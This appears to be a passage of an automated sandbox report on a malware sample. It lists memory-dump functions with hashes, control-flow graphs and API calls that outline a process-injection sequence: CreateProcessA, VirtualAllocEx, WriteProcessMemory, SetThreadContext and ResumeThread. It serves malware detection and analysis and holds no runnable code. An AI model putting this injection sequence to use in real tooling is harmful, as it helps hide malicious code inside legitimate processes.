                                                                    • Opcode Fuzzy Hash: 40fadaa43a7139bfa9f6d72ad9def9fdcd707cce32c4395b013d7f01e44d5506
                                                                    • Instruction Fuzzy Hash: 5DD11974E152298FCB65CF64D880BDEB7B6AF9A304F10A5E9960DB7640EB345F808F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BAB29 Relevance: .3, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 62bb6d17fa0a3bc40afc0c5b050bb75d6bcf18fe3ce6d807c6fa143bdbbc93e0
                                                                    • Instruction ID: 82133874c1718a2ba602a6ba57fc279c12c1b353bfa58ae6846db5bb677d24fd
                                                                    • Opcode Fuzzy Hash: 62bb6d17fa0a3bc40afc0c5b050bb75d6bcf18fe3ce6d807c6fa143bdbbc93e0
                                                                    • Instruction Fuzzy Hash: 03B11B74E152298FCB65CF64C8807DEB7B5AF96304F10A5E9960DB7640EB345F808F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BAB1A Relevance: .3, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5509d2461e5aa42d71d1e38071e020d83b74961a38a2064d186f9b639312198
                                                                    • Instruction ID: 1ca65932fb1750f66ca3c93a5e5d0c0c57270fb1f6efee6327eeae1accc52f56
                                                                    • Opcode Fuzzy Hash: a5509d2461e5aa42d71d1e38071e020d83b74961a38a2064d186f9b639312198
                                                                    • Instruction Fuzzy Hash: 17B11A74E152298FCB65CF64C880BDEB7B5AF96304F10A5E9960DB7640EB345F818F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9330 Relevance: .3, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5d262aaf277f806b553b8e1ca1bac13950ac6787e7a614faf387e27179932ab
                                                                    • Instruction ID: 4c2357491c08651e307d112e83d0ae858e08da965b4f91a962193551c409b0dd
                                                                    • Opcode Fuzzy Hash: f5d262aaf277f806b553b8e1ca1bac13950ac6787e7a614faf387e27179932ab
                                                                    • Instruction Fuzzy Hash: 01B1CCB4D04119DBCB04CFA9C980AEEFBF5FB89308F189529C215BB645E334DA01CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B1C10 Relevance: .2, Instructions: 248COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3723b72e7632a466c2cad863b1396adb060d9a80f03ce8264918342acbeac177
                                                                    • Instruction ID: aa0d9de3dffd1f1178615a691612a61ea3b03d31d348c12772f1742ad095c76e
                                                                    • Opcode Fuzzy Hash: 3723b72e7632a466c2cad863b1396adb060d9a80f03ce8264918342acbeac177
                                                                    • Instruction Fuzzy Hash: CCB1E1B4E002198FDB04CFA9D9909EEBBF6BF89344F20852AD509BB764E7359901CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BEB10 Relevance: .2, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08b29404e02aa4d89150caa0fae927b41d986fd41c2804b05d5f8543db356266
                                                                    • Instruction ID: 3f96e7eb4b904d78c399eff77ddc8e9113af4a1aa195c2d937f5e9feaa5c39dc
                                                                    • Opcode Fuzzy Hash: 08b29404e02aa4d89150caa0fae927b41d986fd41c2804b05d5f8543db356266
                                                                    • Instruction Fuzzy Hash: 43A106B4E05219CFDB14DFE9D581ADEBBF2AF88304F24956AD606BB740E7305A418F60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BCE6A Relevance: .2, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8ddadbebd861840829037c4c848c4c08023b929f77df6e4b5d69e171ecf9c09
                                                                    • Instruction ID: 8a99ce5c60c9e9252a6a47f827e35e038655e146e9a4d65e24294fa29f418b3c
                                                                    • Opcode Fuzzy Hash: a8ddadbebd861840829037c4c848c4c08023b929f77df6e4b5d69e171ecf9c09
                                                                    • Instruction Fuzzy Hash: 21713B74E05218CFEB64CF65D9817DDBBB6BB8A308F0090EAD60DA7650EB345A85CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BCE06 Relevance: .2, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8fab38d63bf7ded9b5b3d986f33442e4dc8e72a0c7ef85f4f849d1a329ae632
                                                                    • Instruction ID: 839f263518acefe0823359e66f3ed249c817a28d4583477d36638edc03a992a8
                                                                    • Opcode Fuzzy Hash: a8fab38d63bf7ded9b5b3d986f33442e4dc8e72a0c7ef85f4f849d1a329ae632
                                                                    • Instruction Fuzzy Hash: FB615D74E05218CFEB64CF65D9817DDBBB5AB8A308F0090EAD60DA7B50E7349A85CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B2F70 Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5377395ad6ef1083ff6848670a93a9704a6b4798a6c3a5d6530387403b696df1
                                                                    • Instruction ID: cead1f42cfad43a179ac085bec475cb2392e8d9752f651bb5953ea25ca34fcd4
                                                                    • Opcode Fuzzy Hash: 5377395ad6ef1083ff6848670a93a9704a6b4798a6c3a5d6530387403b696df1
                                                                    • Instruction Fuzzy Hash: B821C6B1E006188BEB18CF9BD8447DEFBF7AFC9310F14C16AD509A6258EB741A458F90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B0448 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e09f5e65fd6fb437b436489b56958b4353d006c01a58fdd3a7fe8e2ef1b2b0ba
                                                                    • Instruction ID: 304d73a23571fc982c5c0d2cfb3fb4a470e3c9a3ac095a2fed7273f5db33fa72
                                                                    • Opcode Fuzzy Hash: e09f5e65fd6fb437b436489b56958b4353d006c01a58fdd3a7fe8e2ef1b2b0ba
                                                                    • Instruction Fuzzy Hash: AA11DD75E016188BEB1CCFABD8406DEFAF7AFC9200F08C076D908B6254EB3445568E55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BA1E4 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 558 13ba1e4-13ba289 560 13ba28b-13ba2a2 558->560 561 13ba2d2-13ba2fa 558->561 560->561 566 13ba2a4-13ba2a9 560->566 564 13ba2fc-13ba310 561->564 565 13ba340-13ba396 561->565 564->565 576 13ba312-13ba317 564->576 574 13ba398-13ba3ac 565->574 575 13ba3dc-13ba4ca CreateProcessA 565->575 567 13ba2ab-13ba2b5 566->567 568 13ba2cc-13ba2cf 566->568 569 13ba2b9-13ba2c8 567->569 570 13ba2b7 567->570 568->561 569->569 573 13ba2ca 569->573 570->569 573->568 574->575 583 13ba3ae-13ba3b3 574->583 594 13ba4cc-13ba4d2 575->594 595 13ba4d3-13ba598 575->595 577 13ba33a-13ba33d 576->577 578 13ba319-13ba323 576->578 577->565 580 13ba327-13ba336 578->580 581 13ba325 578->581 580->580 584 13ba338 580->584 581->580 586 13ba3d6-13ba3d9 583->586 587 13ba3b5-13ba3bf 583->587 584->577 586->575 588 13ba3c3-13ba3d2 587->588 589 13ba3c1 587->589 588->588 591 13ba3d4 588->591 589->588 591->586 594->595 606 13ba5b4-13ba5b5 595->606 607 13ba58f-13ba598 606->607 608 13ba5b7-13ba5b8 606->608 607->606 609 13ba5ba-13ba5be 608->609 610 13ba5c8-13ba5cc 608->610 609->610 611 13ba5c0 609->611 612 13ba5ce-13ba5d2 610->612 613 13ba5dc-13ba5e0 610->613 611->610 612->613 614 13ba5d4 612->614 615 13ba5e2-13ba5e6 613->615 616 13ba5f0-13ba5f4 613->616 614->613 615->616 617 13ba5e8 615->617 618 13ba62a-13ba635 616->618 619 13ba5f6-13ba61f 616->619 617->616 622 13ba636 618->622 619->618 622->622
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 013BA4B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 1e905c4366c2e9f56472e5344f92f3e8c60f6b47ba0c8fcfbe3a046f8f4ab4cd
                                                                    • Instruction ID: b9d55bff45bbc7d6f36a3948f9b9ac1946aef0c02df6801287a458f1eba5cc90
                                                                    • Opcode Fuzzy Hash: 1e905c4366c2e9f56472e5344f92f3e8c60f6b47ba0c8fcfbe3a046f8f4ab4cd
                                                                    • Instruction Fuzzy Hash: 3DC12871D002298FDB20CFA8C881BEDBBB1BF45308F0491A9D549B7650EB749A89CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BA1F0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 624 13ba1f0-13ba289 626 13ba28b-13ba2a2 624->626 627 13ba2d2-13ba2fa 624->627 626->627 632 13ba2a4-13ba2a9 626->632 630 13ba2fc-13ba310 627->630 631 13ba340-13ba396 627->631 630->631 642 13ba312-13ba317 630->642 640 13ba398-13ba3ac 631->640 641 13ba3dc-13ba4ca CreateProcessA 631->641 633 13ba2ab-13ba2b5 632->633 634 13ba2cc-13ba2cf 632->634 635 13ba2b9-13ba2c8 633->635 636 13ba2b7 633->636 634->627 635->635 639 13ba2ca 635->639 636->635 639->634 640->641 649 13ba3ae-13ba3b3 640->649 660 13ba4cc-13ba4d2 641->660 661 13ba4d3-13ba598 641->661 643 13ba33a-13ba33d 642->643 644 13ba319-13ba323 642->644 643->631 646 13ba327-13ba336 644->646 647 13ba325 644->647 646->646 650 13ba338 646->650 647->646 652 13ba3d6-13ba3d9 649->652 653 13ba3b5-13ba3bf 649->653 650->643 652->641 654 13ba3c3-13ba3d2 653->654 655 13ba3c1 653->655 654->654 657 13ba3d4 654->657 655->654 657->652 660->661 672 13ba5b4-13ba5b5 661->672 673 13ba58f-13ba598 672->673 674 13ba5b7-13ba5b8 672->674 673->672 675 13ba5ba-13ba5be 674->675 676 13ba5c8-13ba5cc 674->676 675->676 677 13ba5c0 675->677 678 13ba5ce-13ba5d2 676->678 679 13ba5dc-13ba5e0 676->679 677->676 678->679 680 13ba5d4 678->680 681 13ba5e2-13ba5e6 679->681 682 13ba5f0-13ba5f4 679->682 680->679 681->682 683 13ba5e8 681->683 684 13ba62a-13ba635 682->684 685 13ba5f6-13ba61f 682->685 683->682 688 13ba636 684->688 685->684 688->688
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 013BA4B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: d77e7d93d542a3eab055c2c3bf7dd6115dbb5117efa8faca5d4ba6ec4c959ffa
                                                                    • Instruction ID: 144ab3feff64033b2d361149f006c0563b7b24e41319964ec2eee0e77a7e2fa0
                                                                    • Opcode Fuzzy Hash: d77e7d93d542a3eab055c2c3bf7dd6115dbb5117efa8faca5d4ba6ec4c959ffa
                                                                    • Instruction Fuzzy Hash: C7C11971D0022D8FDB20CFA4C881BEDBBB1BF55308F0495A9D549B7650EB749A89CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9E61 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 690 13b9e61-13b9ed3 692 13b9eea-13b9f4b WriteProcessMemory 690->692 693 13b9ed5-13b9ee7 690->693 695 13b9f4d-13b9f53 692->695 696 13b9f54-13b9fa6 692->696 693->692 695->696
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013B9F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: ee866a93f826320f59b109194007285c363ba2aad99752f78ee914eab4f28c95
                                                                    • Instruction ID: 67dd7fbf0789296bf531faa418a32944c95be3a93aa86d08290fc2d2a5b8d151
                                                                    • Opcode Fuzzy Hash: ee866a93f826320f59b109194007285c363ba2aad99752f78ee914eab4f28c95
                                                                    • Instruction Fuzzy Hash: FA41ABB5D012589FCF00CFA9D984AEEBBF1BB49314F14902AE919B7610D734AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9E68 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 701 13b9e68-13b9ed3 703 13b9eea-13b9f4b WriteProcessMemory 701->703 704 13b9ed5-13b9ee7 701->704 706 13b9f4d-13b9f53 703->706 707 13b9f54-13b9fa6 703->707 704->703 706->707
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013B9F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 65359f82900f4caece6fc958f1b242547281dc37c70725da0bcac344a1d6ad39
                                                                    • Instruction ID: 94c04665b67d4a27e4d57a9979178bf10be1b04ad2ee01fd4974dc3984006df6
                                                                    • Opcode Fuzzy Hash: 65359f82900f4caece6fc958f1b242547281dc37c70725da0bcac344a1d6ad39
                                                                    • Instruction Fuzzy Hash: FB41AAB5D012589FCF00CFA9D984AEEFBF1BB49314F14902AE919B7210D739AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9FB8 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 712 13b9fb8-13ba082 ReadProcessMemory 715 13ba08b-13ba0dd 712->715 716 13ba084-13ba08a 712->716 716->715
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013BA072
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: f1049e82e75e03a754ad4491ff67c787ea69341258d26c144168ec0af4c2a6f1
                                                                    • Instruction ID: a8e288fac83c1acd03354a82f68840df4b567ba8b849420307f2ee009c600a1d
                                                                    • Opcode Fuzzy Hash: f1049e82e75e03a754ad4491ff67c787ea69341258d26c144168ec0af4c2a6f1
                                                                    • Instruction Fuzzy Hash: CD41BAB9D002589FCF10CFA9D884AEEFBB1BB49314F14942AE815B7710D735A946CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9FC0 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 721 13b9fc0-13ba082 ReadProcessMemory 724 13ba08b-13ba0dd 721->724 725 13ba084-13ba08a 721->725 725->724
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013BA072
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 4c81f0e06d4c64e300af1b5f13ae57cd26631f4edf2859eaf1206550ea161a6e
                                                                    • Instruction ID: 62095457bacdb403722e5bcfe36859804e159a44b4f7f789f58b03c8df1caa23
                                                                    • Opcode Fuzzy Hash: 4c81f0e06d4c64e300af1b5f13ae57cd26631f4edf2859eaf1206550ea161a6e
                                                                    • Instruction Fuzzy Hash: A341A7B9D002589FCF10CFAAD880AEEFBB5BB09314F10942AE915B7610D739A945CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9D41 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 730 13b9d41-13b9e02 VirtualAllocEx 733 13b9e0b-13b9e55 730->733 734 13b9e04-13b9e0a 730->734 734->733
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 013B9DF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 7a6f007ff52b88a7fbd8ac4837da27bacd2f3a57e5ace77a2eea6bc8da24b2de
                                                                    • Instruction ID: 1e639478aeb3121a4831e9a00e08737f26af48b763930202c3b78aa5c569ee5f
                                                                    • Opcode Fuzzy Hash: 7a6f007ff52b88a7fbd8ac4837da27bacd2f3a57e5ace77a2eea6bc8da24b2de
                                                                    • Instruction Fuzzy Hash: 1331C7B9D002489FCF10CFA9D880AEEFBB1BB49314F10902AE915BB710D735A946CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9D48 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 013B9DF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: fe5f079417fdd12cdb582eba79af82bec70dd59e98e175fad2f51e2f7d56a28d
                                                                    • Instruction ID: 6f3fef601cce428514fc8782968cb349b9113a918d14f04c9f93973de571b71f
                                                                    • Opcode Fuzzy Hash: fe5f079417fdd12cdb582eba79af82bec70dd59e98e175fad2f51e2f7d56a28d
                                                                    • Instruction Fuzzy Hash: 5631A7B9D002589FCF10CFA9D880ADEFBB5BB49314F10942AE915BB710D735A945CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9C18 Relevance: 1.6, APIs: 1, Instructions: 98threadinjectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,?), ref: 013B9CCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 808a8ee3269d82e898832d648f15969a64e9c3258549b08124c10a523fae640a
                                                                    • Instruction ID: 80ef4dcce065ae30a09be037b174a560b1e110b9548a24e7dda09337d67b9fbf
                                                                    • Opcode Fuzzy Hash: 808a8ee3269d82e898832d648f15969a64e9c3258549b08124c10a523fae640a
                                                                    • Instruction Fuzzy Hash: 9E41CBB5D012589FCF10CFA9D884AEEBBF0BF48318F14802AE505BB650D738A949CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9C20 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,?), ref: 013B9CCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: d353f2203e681c88e40b2ffa7e653490672fa0b9fc92e389cdd41ff061d7653c
                                                                    • Instruction ID: f02c77ac85de52fee23a2a2ff3502e2a6b371709d6f175999798721094c84c10
                                                                    • Opcode Fuzzy Hash: d353f2203e681c88e40b2ffa7e653490672fa0b9fc92e389cdd41ff061d7653c
                                                                    • Instruction Fuzzy Hash: 1031BBB5D012589FCF10CFAAD884AEEBBF4BF48318F14802AE515B7650D738A949CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BE9F8 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: EnumWindows
                                                                    • String ID:
                                                                    • API String ID: 1129996299-0
                                                                    • Opcode ID: 3317660d6511e9fb100b86b7e33d2cb0991f2dc8ad76a504adc0109210143c39
                                                                    • Instruction ID: 432e1c3be83f11615e4a8460ce708ce6d8733baa7ed4e88d383d566021aea61b
                                                                    • Opcode Fuzzy Hash: 3317660d6511e9fb100b86b7e33d2cb0991f2dc8ad76a504adc0109210143c39
                                                                    • Instruction Fuzzy Hash: F131D8B4D002189FDB10CFA9D880AEEFBB5BB49314F10942AE805B7610D778A945CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9B28 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 013B9BAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: f4936d1cd8d557c2b995548ab51e2ab84fd92f8252fb1800a189dbedca71cfd3
                                                                    • Instruction ID: 73ac8e99bc4f2241813dcb550075d6481c5b822b9478da401b37bdcb7d965f20
                                                                    • Opcode Fuzzy Hash: f4936d1cd8d557c2b995548ab51e2ab84fd92f8252fb1800a189dbedca71cfd3
                                                                    • Instruction Fuzzy Hash: D331CCB5D012589FCF10CFAAD885AEEFBB4AF48318F14802AE915B7750D734A905CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B9B30 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 013B9BAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 222523585b630527fdf8a84283bfb9dffeb1bad591e04d75748ba90540164a8c
                                                                    • Instruction ID: 8f6ff8c65a9a1af56864c31ae258f9ad079a516b3aedb7f5bf28650b7654bc17
                                                                    • Opcode Fuzzy Hash: 222523585b630527fdf8a84283bfb9dffeb1bad591e04d75748ba90540164a8c
                                                                    • Instruction Fuzzy Hash: 5231CAB4D002189FCF10CFAAD880AEEFBB4AB48318F10802AE915B7710D734A905CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BE728 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
